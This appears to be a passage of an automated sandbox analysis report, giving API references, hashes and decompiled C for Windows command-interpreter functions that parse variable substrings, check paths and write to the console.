0x4a74f3d4
0x4a74f3d9
0x4a74f3d9
0x4a74f3d2
0x4a74f3e4
0x4a74f3e4
0x4a74f3e9
0x4a74f404
0x4a74f408
0x4a74f40d
0x4a74f410
0x4a74f410
0x4a74f416
0x00000000
0x00000000
0x4a74f420
0x4a74f430
0x4a74f430
0x4a74f43c
0x4a74f43c
0x4a74f448
0x4a74f44d
0x4a74f452
0x4a74f453
0x4a74f459
0x4a74f45f
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 4A74F3A0
ReadFile.KERNEL32(00000000), ref: 4A74F3A4
_get_osfhandle.MSVCRT ref: 4A74F42C
SetFilePointer.KERNEL32(00000000), ref: 4A74F430

Part of subcall function 4A74F354: longjmp.MSVCRT(4A754AC0,00000001,?,?,4A7487D6,00000001,?,?,?), ref: 4A74F348
Part of subcall function 4A74F354: GetLastError.KERNEL32 ref: 4A74F43F

Strings

%9d, xrefs: 4A74F2FA

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: File_get_osfhandle$ErrorLastPointerReadlongjmp
String ID: %9d
API String ID: 769294559-2241623522
Opcode ID: 3a9ea67b33707501ac9c79a12516909b5ac100075c9a31106cd9c876bfdc1778
Instruction ID: f919d7c3f8881919ad74ae1174fe85f9bfb37c0a40c7632f7c061beb74d212e3
Opcode Fuzzy Hash: 3a9ea67b33707501ac9c79a12516909b5ac100075c9a31106cd9c876bfdc1778
Instruction Fuzzy Hash: A13181B6A04209BFDF649FA4C885D9E3F7DEF04710F11852AFA02D6580DA70A948CB20

Uniqueness

Uniqueness Score: -1.00%

Function 4A735291, Relevance: 9.4, APIs: 6, Instructions: 390
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E4A735291(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t117;
				intOrPtr* _t119;
				signed int _t122;
				void* _t123;
				short* _t129;
				wchar_t* _t130;
				wchar_t* _t132;
				long _t141;
				intOrPtr* _t142;
				signed int _t146;
				intOrPtr* _t147;
				intOrPtr* _t151;
				void* _t153;
				wchar_t* _t157;
				wchar_t* _t169;
				wchar_t* _t171;
				wchar_t* _t175;
				wchar_t* _t177;
				void _t181;
				wchar_t* _t196;
				signed int _t198;
				void* _t199;
				signed int _t202;
				intOrPtr _t207;
				void* _t208;
				void _t212;
				signed int _t213;
				signed int _t215;
				void* _t217;
				void* _t221;
				signed int _t225;
				signed int _t227;
				signed int _t229;
				void _t234;
				intOrPtr _t235;
				void _t236;
				void* _t237;
				void* _t238;
				intOrPtr _t239;
				void _t240;
				void* _t241;
				intOrPtr _t242;
				void _t244;
				void _t245;
				void* _t247;
				void* _t248;
				void* _t253;
				signed int _t254;
				void* _t255;
				void* _t256;
				signed int _t257;
				intOrPtr _t258;
				void* _t259;
				void* _t260;
				signed int _t261;
				void* _t262;
				void* _t263;
				long _t264;
				void* _t266;
				void* _t267;

				_push(0x38);
				_push(0x4a7352f0);
				E4A73264A(__ebx, __edi, __esi);
				_t247 = 0;
				 *(_t266 - 0x30) = 0;
				 *(_t266 - 0x28) = 0;
				 *(_t266 - 0x34) = 0;
				 *((intOrPtr*)(_t266 - 4)) = 0;
				_t117 = E4A731896(0x4000);
				 *(_t266 - 0x30) = _t117;
				if(_t117 == 0) {
					L66:
					if( *(_t266 + 8) != _t247) {
						L72:
						__imp__longjmp( *(_t266 + 8), 0xffffffff);
						L73:
						_t199 = _t247;
						_t99 = _t199 + 2; // 0x2
						_t253 = _t99;
						do {
							_t234 =  *_t199;
							_t199 = _t199 + 2;
						} while (_t234 != 0);
						_t202 = _t199 - _t253 >> 1;
						L43:
						if(_t202 < 0) {
							_t117 = 0;
							L47:
							_t254 = _t117;
							 *(_t266 - 0x38) = _t254;
							if( *( *(_t266 - 0x1c)) != 0x2c) {
								_t203 = _t247 + _t254 * 2;
								_t119 = _t247 + _t254 * 2;
								_t103 = _t119 + 2; // 0x4
								_t255 = _t103;
								while(1) {
									_t235 =  *_t119;
									_t119 = _t119 + 2;
									if(_t235 == 0) {
										break;
									}
								}
								L56:
								_t122 = _t119 - _t255 >> 1;
								L57:
								 *(_t266 - 0x20) = _t122;
								_t123 = _t247;
								_t72 = _t123 + 2; // 0x2
								_t256 = _t72;
								do {
									_t236 =  *_t123;
									_t123 = _t123 + 2;
								} while (_t236 != 0);
								_t257 =  *(_t266 - 0x20);
								E4A734B3D(_t247, (_t123 - _t256 >> 1) + 1, _t203, _t257);
								_t129 = _t247 + _t257 * 2;
								if( *_t129 != 0) {
									 *_t129 = 0;
								}
								_t130 =  *(_t266 - 0x1c);
								_t132 =  &(_t130[0]);
								 *(_t266 - 0x1c) = _t132;
								if( *_t130 !=  *((intOrPtr*)(_t266 + 0x14))) {
									 *( *(_t266 + 0x10)) =  *( *(_t266 + 0x10)) & 0x00000000;
									L14:
									 *((intOrPtr*)(_t266 - 4)) = 0xfffffffe;
									E4A7353A1();
									return E4A7313B6( *(_t266 - 0x34));
								}
								 *( *(_t266 + 0x10)) = _t132 -  *(_t266 + 0xc) >> 1;
								L22:
								 *(_t266 - 0x34) =  *(_t266 - 0x24);
								goto L14;
							}
							 *(_t266 - 0x1c) =  &(( *(_t266 - 0x1c))[0]);
							_t141 = wcstol( *(_t266 - 0x1c), _t266 - 0x1c, 0);
							 *(_t266 - 0x20) = _t141;
							if(_t141 < 0) {
								_t142 = _t247 + _t254 * 2;
								_t85 = _t142 + 2; // 0x2
								_t237 = _t85;
								do {
									_t207 =  *_t142;
									_t142 = _t142 + 2;
								} while (_t207 != 0);
								 *(_t266 - 0x20) =  *(_t266 - 0x20) + (_t142 - _t237 >> 1);
							}
							if( *(_t266 - 0x20) < 0) {
								_t146 = 0;
							} else {
								_t146 =  *(_t266 - 0x20);
							}
							 *(_t266 - 0x20) = _t146;
							_t203 = _t247 + _t254 * 2;
							_t147 = _t203;
							_t238 = _t147 + 2;
							do {
								_t258 =  *_t147;
								_t147 = _t147 + 2;
							} while (_t258 != 0);
							if( *(_t266 - 0x20) < _t147 - _t238 >> 1) {
								_t122 =  *(_t266 - 0x20);
								goto L57;
							}
							_t151 = _t203;
							_t255 = _t151 + 2;
							do {
								_t239 =  *_t151;
								_t151 = _t151 + 2;
							} while (_t239 != 0);
							goto L56;
						}
						_t208 = _t247;
						_t55 = _t208 + 2; // 0x2
						_t259 = _t55;
						do {
							_t240 =  *_t208;
							_t208 = _t208 + 2;
						} while (_t240 != 0);
						if(_t117 >= _t208 - _t259 >> 1) {
							_t153 = _t247;
							_t100 = _t153 + 2; // 0x2
							_t241 = _t100;
							do {
								_t212 =  *_t153;
								_t153 = _t153 + 2;
							} while (_t212 != 0);
							_t117 = _t153 - _t241 >> 1;
						}
						goto L47;
					}
					L64:
					 *( *(_t266 + 0x10)) = _t247;
					goto L14;
				}
				_t196 =  *(_t266 + 0xc);
				_t157 = _t196;
				_t242 =  *((intOrPtr*)(_t266 + 0x14));
				while(1) {
					 *(_t266 - 0x1c) = _t157;
					_t213 =  *_t157 & 0x0000ffff;
					if(_t213 == _t247 || _t213 == _t242 ||  *0x4a754081 != 0 && _t213 == 0x3a && _t157[0] != _t242) {
						break;
					}
					_t157 =  &(_t157[0]);
				}
				if( *_t157 == _t247 || _t157 == _t196) {
					goto L64;
				} else {
					_t260 = (_t157 - _t196 >> 1) + 1;
					_t117 = E4A731896(_t260 + _t260);
					 *(_t266 - 0x28) = _t117;
					if(_t117 == _t247) {
						goto L66;
					}
					_t12 = _t260 - 1; // 0x664a7353
					E4A734B3D( *(_t266 - 0x28), _t260, _t196, _t12);
					_t261 =  *( *(_t266 - 0x1c)) & 0x0000ffff;
					 *(_t266 - 0x1c) =  &(( *(_t266 - 0x1c))[0]);
					_t247 = E4A732070( *(_t266 - 0x28));
					 *(_t266 - 0x24) = _t247;
					if( *0x4a754081 == 0 || _t261 != 0x3a || _t247 == 0) {
						 *( *(_t266 + 0x10)) =  *(_t266 - 0x1c) - _t196 >> 1;
						 *(_t266 - 0x34) = _t247;
						goto L14;
					} else {
						_t169 =  *(_t266 - 0x1c);
						_t215 =  *_t169 & 0x0000ffff;
						if(_t215 == 0x7e) {
							_t171 =  &(_t169[0]);
							 *(_t266 - 0x1c) = _t171;
							_t117 = wcstol(_t171, _t266 - 0x1c, 0);
							_t267 = _t267 + 0xc;
							 *(_t266 - 0x38) = _t117;
							if(_t117 >= 0) {
								L39:
								_t217 = _t247;
								_t54 = _t217 + 2; // 0x2
								_t262 = _t54;
								do {
									_t244 =  *_t217;
									_t217 = _t217 + 2;
								} while (_t244 != 0);
								if(_t117 >= _t217 - _t262 >> 1) {
									goto L73;
								}
								_t202 = _t117;
								goto L43;
							}
							_t221 = _t247;
							_t52 = _t221 + 2; // 0x2
							_t263 = _t52;
							do {
								_t245 =  *_t221;
								_t221 = _t221 + 2;
							} while (_t245 != 0);
							_t117 = _t117 + (_t221 - _t263 >> 1);
							 *(_t266 - 0x38) = _t117;
							goto L39;
						}
						if(_t215 == 0x2a) {
							_t169 =  &(_t169[0]);
							 *(_t266 - 0x1c) = _t169;
							 *((intOrPtr*)(_t266 - 0x40)) = 1;
						} else {
							 *((intOrPtr*)(_t266 - 0x40)) = 0;
						}
						 *(_t266 - 0x3c) = _t169;
						while(1) {
							_t225 =  *_t169 & 0x0000ffff;
							if(_t225 == 0 || _t225 == 0x3d) {
								break;
							}
							_t169 =  &(_t169[0]);
							 *(_t266 - 0x1c) = _t169;
						}
						if( *_t169 == 0) {
							L86:
							 *( *(_t266 + 0x10)) = 0;
							goto L14;
						}
						_t227 = _t169 -  *(_t266 - 0x3c);
						_t228 = _t227 >> 1;
						 *(_t266 - 0x2c) = _t227 >> 1;
						if(_t227 == 0) {
							if( *(_t266 + 8) == 0) {
								goto L86;
							}
							_t117 = E4A736D44(_t228, 0x234a, 1, _t169);
							_t267 = _t267 + 0xc;
							goto L72;
						}
						_t175 =  &(_t169[0]);
						 *(_t266 - 0x1c) = _t175;
						 *(_t266 + 8) = _t175;
						while(1) {
							_t229 =  *_t175 & 0x0000ffff;
							if(_t229 == 0 || _t229 ==  *((intOrPtr*)(_t266 + 0x14))) {
								break;
							}
							_t175 =  &(_t175[0]);
							 *(_t266 - 0x1c) = _t175;
						}
						if( *_t175 == 0) {
							goto L86;
						}
						_t177 =  &(_t175[0]);
						 *(_t266 - 0x1c) = _t177;
						_t198 = _t175 -  *(_t266 + 8) >> 1;
						 *( *(_t266 + 0x10)) = _t177 -  *(_t266 + 0xc) >> 1;
						if( *_t247 == 0) {
							goto L22;
						}
						_t248 =  *(_t266 - 0x24);
						_t264 =  *(_t266 - 0x30);
						_t181 = E4A73185A(_t264, 0x2000, _t248);
						 *(_t266 - 0x48) = _t264;
						 *(_t266 - 0x44) = _t248;
						while(1) {
							L20:
							__imp___wcsnicmp(_t264,  *(_t266 - 0x3c),  *(_t266 - 0x2c));
							_t267 = _t267 + 0xc;
							if(_t181 != 0) {
								break;
							}
							if( *((intOrPtr*)(_t266 - 0x40)) != _t181) {
								memcpy( *(_t266 - 0x24),  *(_t266 + 8), _t198 + _t198);
								E4A73185A( *(_t266 - 0x24) + _t198 + _t198, 0x2000 - _t198, _t264 +  *(_t266 - 0x2c) * 2);
								goto L22;
							}
							memcpy(_t248,  *(_t266 + 8), _t198 + _t198);
							_t267 = _t267 + 0xc;
							_t248 = _t248 + _t198 + _t198;
							 *(_t266 - 0x44) = _t248;
							_t181 =  *(_t266 - 0x2c);
							_t264 = _t264 + _t181 * 2;
							 *(_t266 - 0x48) = _t264;
						}
						_t181 =  *_t264;
						 *_t248 = _t181;
						_t248 = _t248 + 2;
						 *(_t266 - 0x44) = _t248;
						_t264 = _t264 + 2;
						 *(_t266 - 0x48) = _t264;
						if( *((short*)(_t248 - 2)) != 0) {
							goto L20;
						}
						goto L22;
					}
				}
			}

0x4a735291
0x4a735293
0x4a735298
0x4a73529d
0x4a73529f
0x4a7352a2
0x4a7352a5
0x4a7352a8
0x4a7352b0
0x4a7352b5
0x4a7352ba
0x4a73fdab
0x4a73fdae
0x4a746ae8
0x4a746aed
0x4a746af3
0x4a746af3
0x4a746af5
0x4a746af5
0x4a746af8
0x4a746af8
0x4a746afc
0x4a746afd
0x4a746b04
0x4a73f4c0
0x4a73f4c2
0x4a73f6e8
0x4a73f4e3
0x4a73f4e3
0x4a73f4e5
0x4a73f4ef
0x4a746b2a
0x4a746b2d
0x4a746b2f
0x4a746b2f
0x4a746b32
0x4a746b32
0x4a746b36
0x4a746b3a
0x00000000
0x00000000
0x4a746b40
0x4a73f54c
0x4a73f54e
0x4a73f550
0x4a73f550
0x4a73f553
0x4a73f555
0x4a73f555
0x4a73f558
0x4a73f558
0x4a73f55c
0x4a73f55d
0x4a73f566
0x4a73f56e
0x4a73f573
0x4a73f57a
0x4a746b44
0x4a746b44
0x4a73f580
0x4a73f587
0x4a73f588
0x4a73f58f
0x4a746b4f
0x4a735385
0x4a735385
0x4a73538c
0x4a735399
0x4a735399
0x4a73f59d
0x4a73f342
0x4a73f345
0x00000000
0x4a73f345
0x4a73f4f5
0x4a73f502
0x4a73f507
0x4a73f50c
0x4a73fda3
0x4a73fda6
0x4a73fda6
0x4a73fdb6
0x4a73fdb6
0x4a73fdba
0x4a73fdbb
0x4a73fdc4
0x4a73fdc4
0x4a73f516
0x4a746b23
0x4a73f51c
0x4a73f51c
0x4a73f51c
0x4a73f51f
0x4a73f522
0x4a73f525
0x4a73f527
0x4a73f52a
0x4a73f52a
0x4a73f52e
0x4a73f52f
0x4a73f53b
0x4a73f5a4
0x00000000
0x4a73f5a4
0x4a73f53d
0x4a73f53f
0x4a73f542
0x4a73f542
0x4a73f546
0x4a73f547
0x00000000
0x4a73f542
0x4a73f4c8
0x4a73f4ca
0x4a73f4ca
0x4a73f4cd
0x4a73f4cd
0x4a73f4d1
0x4a73f4d2
0x4a73f4dd
0x4a746b0b
0x4a746b0d
0x4a746b0d
0x4a746b10
0x4a746b10
0x4a746b14
0x4a746b15
0x4a746b1c
0x4a746b1c
0x00000000
0x4a73f4dd
0x4a73fd99
0x4a73fd9c
0x00000000
0x4a73fd9c
0x4a7352c0
0x4a7352c3
0x4a7352c5
0x4a7352c9
0x4a7352c9
0x4a7352cc
0x4a7352d2
0x00000000
0x00000000
0x4a7352e9
0x4a7352e9
0x4a735315
0x00000000
0x4a735323
0x4a735328
0x4a73532e
0x4a735333
0x4a735338
0x00000000
0x00000000
0x4a73533e
0x4a735347
0x4a73534f
0x4a735352
0x4a73535e
0x4a735360
0x4a73536a
0x4a735380
0x4a735382
0x00000000
0x4a73f2f1
0x4a73f2f1
0x4a73f2f4
0x4a73f2fb
0x4a73f46f
0x4a73f470
0x4a73f47f
0x4a73f481
0x4a73f484
0x4a73f489
0x4a73f4a3
0x4a73f4a3
0x4a73f4a5
0x4a73f4a5
0x4a73f4a8
0x4a73f4a8
0x4a73f4ac
0x4a73f4ad
0x4a73f4b8
0x00000000
0x00000000
0x4a73f4be
0x00000000
0x4a73f4be
0x4a73f48b
0x4a73f48d
0x4a73f48d
0x4a73f490
0x4a73f490
0x4a73f494
0x4a73f495
0x4a73f49e
0x4a73f4a0
0x00000000
0x4a73f4a0
0x4a73f305
0x4a746b58
0x4a746b59
0x4a746b5c
0x4a73f30b
0x4a73f30b
0x4a73f30b
0x4a73f30e
0x4a73f34d
0x4a73f34d
0x4a73f353
0x00000000
0x00000000
0x4a73f35c
0x4a73f35d
0x4a73f35d
0x4a73f365
0x4a746b68
0x4a746b6b
0x00000000
0x4a746b6b
0x4a73f36d
0x4a73f370
0x4a73f372
0x4a73f375
0x4a746b75
0x00000000
0x00000000
0x4a746b7f
0x4a746b84
0x00000000
0x4a746b84
0x4a73f37c
0x4a73f37d
0x4a73f380
0x4a73f383
0x4a73f383
0x4a73f389
0x00000000
0x00000000
0x4a73f392
0x4a73f393
0x4a73f393
0x4a73f39b
0x00000000
0x00000000
0x4a73f3a4
0x4a73f3a5
0x4a73f3ad
0x4a73f3b7
0x4a73f3bc
0x00000000
0x00000000
0x4a73f3be
0x4a73f3c8
0x4a73f3cc
0x4a73f3d1
0x4a73f3d4
0x4a73f313
0x4a73f313
0x4a73f31a
0x4a73f320
0x4a73f325
0x00000000
0x00000000
0x4a73fe4d
0x4a746b96
0x4a746bb3
0x00000000
0x4a746bb3
0x4a73fe5b
0x4a73fe60
0x4a73fe66
0x4a73fe68
0x4a73fe6b
0x4a73fe6e
0x4a73fe71
0x4a73fe71
0x4a73f32b
0x4a73f32e
0x4a73f332
0x4a73f333
0x4a73f337
0x4a73f338
0x4a73f340
0x00000000
0x00000000
0x00000000
0x4a73f340
0x4a73536a

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 473a2b1a1ea05b404705f50cc651cccc94c034638bf42130151db92cf7ffd901
Instruction ID: 1c05453909b030b7102a069425f51adf248a63ed3a89d35a0201723744f0e740
Opcode Fuzzy Hash: 473a2b1a1ea05b404705f50cc651cccc94c034638bf42130151db92cf7ffd901
Instruction Fuzzy Hash: FCD1D471D18A06EFCF64DF68C8846ED7BB4EF09344B124169D852EB292E7709A4ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 4A73944C, Relevance: 9.2, APIs: 6, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E4A73944C(void* __ebx, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				int _v16;
				signed int __edi;
				WCHAR** __esi;
				signed int _t34;
				signed int _t35;
				signed int _t39;
				signed int _t40;
				void* _t41;
				signed int _t43;
				signed int _t45;
				signed int _t47;
				signed int* _t50;
				void* _t54;

				_t41 = __ebx;
				 *0x4a754128 =  *0x4a754128 & 0x00000000;
				_t50 = _a4;
				_t43 =  *_t50;
				_v12 = 0x4a754874;
				_t45 = _t43 + 2;
				do {
					__di =  *__eax;
					__eax = __eax + 1;
					__eax = __eax + 1;
					__eflags = __di;
				} while (__di != 0);
				__eax = __eax - __edx;
				_push(__ebx);
				_v8 = __eax;
				__edi = E4A732ED1(__ecx);
				__eflags =  *__edi - 0x3a;
				if( *__edi == 0x3a) {
					__eflags = _v8 - 2;
					if(_v8 <= 2) {
						goto L4;
					}
					__ebx = SetErrorMode;
					__eax = 0;
					 *__edi = __ax;
					__edi = __edi - 1;
					__edi = __edi - 1;
					_v16 = SetErrorMode(0);
					__eax = E4A7339EF( *__esi, 0x8000);
					_a4 = __eax;
					__eflags = __eax - 0xffffffff;
					if(__eax == 0xffffffff) {
						L44:
						__edi = __edi + 1;
						__edi = __edi + 1;
						__eax = 0x3a;
						 *__edi = __ax;
						__eflags =  *0x4a754098 - 4;
						if( *0x4a754098 != 4) {
							__eax = E4A736D44(__ecx, 0x236b, 1,  *__esi);
						} else {
							__eflags =  *0x4a7540ec;
							if( *0x4a7540ec == 0) {
								__eax = E4A736D44(__ecx, 0x236b, 1,  *__esi);
							}
							 *0x4a7540f0 = 1;
						}
						__eflags = _a4 - 0xffffffff;
						L50:
						if(__eflags == 0) {
							L52:
							__eax = SetErrorMode(_v16);
							goto L4;
						}
						L51:
						__eax = E4A733AB3(_a4);
						goto L52;
					}
					__eax = E4A733B03(__eax, __ecx, __eax);
					__eflags = __eax;
					if(__eax != 0) {
						L42:
						__eax = E4A733B03(__eax, __ecx, _a4);
						__eflags = __eax;
						if(__eax != 0) {
							goto L51;
						}
						__eflags = __eax;
						goto L50;
					}
					__eax = E4A736BEA(__eax, _a4);
					__eflags = __eax;
					if(__eax == 0) {
						goto L44;
					}
					goto L42;
				}
				L4:
				__esi[6] = E4A732041(0x250);
				__ecx =  *__edi & 0x0000ffff;
				__ax =  *0x4a770664; // 0x5c
				_a4 =  *__edi & 0x0000ffff;
				__eflags = __cx - __ax;
				if(__cx == __ax) {
					L29:
					__ax =  *0x4a770664; // 0x5c
					__eflags = _a4 - __ax;
					if(_a4 == __ax) {
						_v12 = 0x4a754876;
					}
					__eax = E4A740BC9( *__esi);
					__eflags = __al;
					if(__al == 0) {
						__edi = _v8;
						__ebx =  *__esi;
						__edi = _v8 + 5;
						__eflags = __edi;
						__eax = __edi + __edi;
						 *__esi = E4A732041(__edi + __edi);
						__eax = E4A7320A9(__esi,  *__esi, __edi, _v12);
					}
					__eax = __esi[6];
					 *(__esi[6]) = 0x10;
					L14:
					__edx =  *__esi;
					0 = 1;
					__edi = 0;
					__eflags = 0;
					__ecx =  *__esi;
					while(1) {
						_t34 =  *_t43 & 0x0000ffff;
						if(_t34 == 0) {
							break;
						}
						_t54 = _t34 -  *0x4a770664; // 0x5c
						if(_t54 == 0) {
							L1:
							_t47 = _t43;
							L18:
							_t43 = _t43 + 2;
							_t41 = _t41 + 1;
							continue;
						}
						if(_t34 == 0x3a) {
							__eflags = _t41 - 2;
							if(_t41 != 2) {
								goto L18;
							}
							goto L1;
						}
						goto L18;
					}
					_t50[3] = _t47;
					__eflags = _t47;
					if(_t47 == 0) {
						_t50[4] = _t45;
						_t47 = _t45;
					} else {
						__eflags =  *_t47 - _t34;
						_t10 = _t47 + 2; // 0x2
						_t40 = _t10;
						if( *_t47 == _t34) {
							_t40 = _t47;
						}
						_t50[4] = _t40;
					}
					_t35 = E4A7318EB(_t47, 0x2a);
					__eflags = _t35;
					if(_t35 != 0) {
						L28:
						_t50[7] = _t50[7] | 0x00000008;
						 *0x4a7540f4 = 1;
						goto L24;
					} else {
						_t39 = E4A7318EB(_t47, 0x3f);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L28;
						}
						L24:
						_t50[5] = E4A7318EB(_t47, 0x2e);
						__eflags = 1;
						return 1;
					}
				}
				__eax = __ax & 0x0000ffff;
				__edi = E4A732148( *__esi, __ax & 0x0000ffff);
				__eflags = __edi;
				if(__edi == 0) {
					__edi =  *__esi;
					__eax = __edi;
					_t31 = __eax + 2; // 0x2
					__edx = _t31;
					do {
						__cx =  *__eax;
						__eax = __eax + 1;
						__eax = __eax + 1;
						__eflags = __cx;
					} while (__cx != 0);
					__eax = __eax - __edx;
					__eax = __eax >> 1;
					__eflags = __eax - 2;
					if(__eax >= 2) {
						__eflags =  *((short*)(__edi + 2)) - 0x3a;
						if( *((short*)(__edi + 2)) == 0x3a) {
							__edi = __edi + 4;
						}
					}
					goto L7;
				} else {
					__edi = __edi + 1;
					__edi = __edi + 1;
					__eflags = __edi;
					L7:
					__ebx = __imp___wcsicmp;
					__eax =  *__ebx(E4A732EC4);
					__ecx = __edi;
					_pop(__ecx);
					__eflags = __eax;
					if(__eax == 0) {
						goto L29;
					}
					__eax =  *__ebx(E4A732EBC);
					__ecx = __edi;
					_pop(__ecx);
					__eflags = __eax;
					if(__eax == 0) {
						goto L29;
					}
					__eflags =  *0x4a754098 - 4;
					if( *0x4a754098 == 4) {
						__eflags =  *0x4a7540e8 - 1;
						if( *0x4a7540e8 == 1) {
							goto L10;
						}
						__eflags =  *0x4a75409c - 1;
						if( *0x4a75409c != 1) {
							goto L14;
						}
						 *0x4a75409c =  *0x4a75409c & 0x00000000;
					}
					L10:
					__ebx = GetFileAttributesW( *__esi);
					__eflags = __ebx - 0xffffffff;
					if(__ebx == 0xffffffff) {
						 *0x4a754128 = GetLastError();
					} else {
						 *0x4a754128 =  *0x4a754128 & 0x00000000;
						__eflags =  *0x4a754128;
					}
					__eflags = __ebx - 0xffffffff;
					if(__ebx != 0xffffffff) {
						__eflags = __bl & 0x00000010;
						if((__bl & 0x00000010) != 0) {
							goto L29;
						}
					}
					goto L14;
				}
			}

0x4a73944c
0x4a739454
0x4a73945c
0x4a73945f
0x4a739464
0x4a73946b
0x4a73946e
0x4a73946e
0x4a739471
0x4a739472
0x4a739473
0x4a739473
0x4a739478
0x4a73947a
0x4a73947e
0x4a739486
0x4a739488
0x4a73948c
0x4a74961d
0x4a749621
0x00000000
0x00000000
0x4a749627
0x4a74962d
0x4a74962f
0x4a749632
0x4a749634
0x4a74963e
0x4a749641
0x4a749646
0x4a749649
0x4a74964c
0x4a74967c
0x4a74967c
0x4a74967f
0x4a749680
0x4a749681
0x4a749684
0x4a74968b
0x4a7496bc
0x4a74968d
0x4a74968d
0x4a749694
0x4a74969f
0x4a7496a4
0x4a7496a7
0x4a7496a7
0x4a7496c4
0x4a7496c8
0x4a7496c8
0x4a7496d2
0x4a7496d5
0x00000000
0x4a7496d5
0x4a7496ca
0x4a7496cd
0x00000000
0x4a7496cd
0x4a74964f
0x4a749654
0x4a749656
0x4a749664
0x4a749667
0x4a74966c
0x4a74966e
0x00000000
0x00000000
0x4a749678
0x00000000
0x4a749678
0x4a74965b
0x4a749660
0x4a749662
0x00000000
0x00000000
0x00000000
0x4a749662
0x4a739492
0x4a73949c
0x4a73949f
0x4a7394a2
0x4a7394a8
0x4a7394ab
0x4a7394ae
0x4a740b68
0x4a740b68
0x4a740b6e
0x4a740b72
0x4a740b74
0x4a740b74
0x4a740b7d
0x4a740b82
0x4a740b84
0x4a740b86
0x4a740b89
0x4a740b8b
0x4a740b8b
0x4a740b8e
0x4a740b9a
0x4a740ba7
0x4a740ba7
0x4a740bac
0x4a740baf
0x4a73952a
0x4a73952a
0x4a73952e
0x4a73952f
0x4a73952f
0x4a739531
0x4a739533
0x4a739533
0x4a739539
0x00000000
0x00000000
0x4a73953b
0x4a739542
0x4a739440
0x4a739440
0x4a73954e
0x4a73954f
0x4a739550
0x00000000
0x4a739550
0x4a73954c
0x4a7395a2
0x4a7395a5
0x00000000
0x00000000
0x00000000
0x4a7395a7
0x00000000
0x4a73954c
0x4a739553
0x4a739557
0x4a739559
0x4a740bba
0x4a740bbd
0x4a73955f
0x4a73955f
0x4a739562
0x4a739562
0x4a739565
0x4a74970d
0x4a74970d
0x4a73956b
0x4a73956b
0x4a739571
0x4a739576
0x4a739578
0x4a739624
0x4a739624
0x4a739628
0x00000000
0x4a73957e
0x4a739581
0x4a739586
0x4a739588
0x00000000
0x00000000
0x4a73958e
0x4a739596
0x4a73959c
0x4a73959f
0x4a73959f
0x4a739578
0x4a7394b4
0x4a7394bf
0x4a7394c1
0x4a7394c3
0x4a7496dc
0x4a7496de
0x4a7496e0
0x4a7496e0
0x4a7496e3
0x4a7496e3
0x4a7496e6
0x4a7496e7
0x4a7496e8
0x4a7496e8
0x4a7496ed
0x4a7496ef
0x4a7496f1
0x4a7496f4
0x4a7496fa
0x4a7496ff
0x4a749705
0x4a749705
0x4a7496ff
0x00000000
0x4a7394c9
0x4a7394c9
0x4a7394ca
0x4a7394ca
0x4a7394cb
0x4a7394cb
0x4a7394d7
0x4a7394d9
0x4a7394da
0x4a7394db
0x4a7394dd
0x00000000
0x00000000
0x4a7394e9
0x4a7394eb
0x4a7394ec
0x4a7394ed
0x4a7394ef
0x00000000
0x00000000
0x4a7394f5
0x4a7394fc
0x4a7411e4
0x4a7411eb
0x00000000
0x00000000
0x4a7411f1
0x4a7411f8
0x00000000
0x00000000
0x4a7411fe
0x4a7411fe
0x4a739502
0x4a73950a
0x4a73950c
0x4a73950f
0x4a73961a
0x4a739515
0x4a739515
0x4a739515
0x4a739515
0x4a73951c
0x4a73951f
0x4a739521
0x4a739524
0x00000000
0x00000000
0x4a739524
0x00000000
0x4a73951f

APIs

_wcsicmp.MSVCRT ref: 4A7394D7
_wcsicmp.MSVCRT ref: 4A7394E9
GetFileAttributesW.KERNEL32(00000000), ref: 4A739504

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _wcsicmp$AttributesFile
String ID:
API String ID: 2635507994-0
Opcode ID: a3a7d727d62d315c931a2a2ddeb0b88fed2f8242c0128228fe37d9c534b337ba
Instruction ID: fc0d2637960914e1e9f32fc27a57a3609532a1241a78d29424513301391fc82d
Opcode Fuzzy Hash: a3a7d727d62d315c931a2a2ddeb0b88fed2f8242c0128228fe37d9c534b337ba
Instruction Fuzzy Hash: 1371577450DA02EAEB708F20CC55AA67FB9EF41324F234129E895CB993E770C98DCB55

Uniqueness

Uniqueness Score: -1.00%

Function 4A73A995, Relevance: 9.2, APIs: 6, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E4A73A995(void* __ecx, intOrPtr _a4) {
				void _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t37;
				void* _t38;
				long _t39;
				void* _t57;
				int _t58;
				void* _t61;
				void* _t63;
				int _t68;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t85;
				intOrPtr _t88;
				signed int _t92;
				signed int _t95;

				_t72 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_push(_t68);
				_t88 = _a4;
				if(E4A734490(E4A73AA4F(_t88), 1) != 0) {
					_t84 =  *(_t88 + 0x10);
					_t37 = _t84 +  *(_t88 + 8) * 2;
					_v12 = _t37;
					while(_t84 < _t37) {
						_t68 = _t84;
						if(_t84 >= _t37) {
							goto L3;
						} else {
							while( *_t68 != 0x2022) {
								_t68 = _t68 + 2;
								if(_t68 < _t37) {
									continue;
								}
								break;
							}
							if(_t68 == _t84) {
								goto L19;
							} else {
								_t63 =  &_v8;
								_t95 = _t68 - _t84 >> 1;
								__imp___get_osfhandle(_t84, _t95, _t63, 0);
								_t72 = 1;
								if(WriteConsoleW(_t63, ??, ??, ??, ??) == 0 || _v8 != _t95) {
									L27:
									_t88 = _a4;
									goto L28;
								} else {
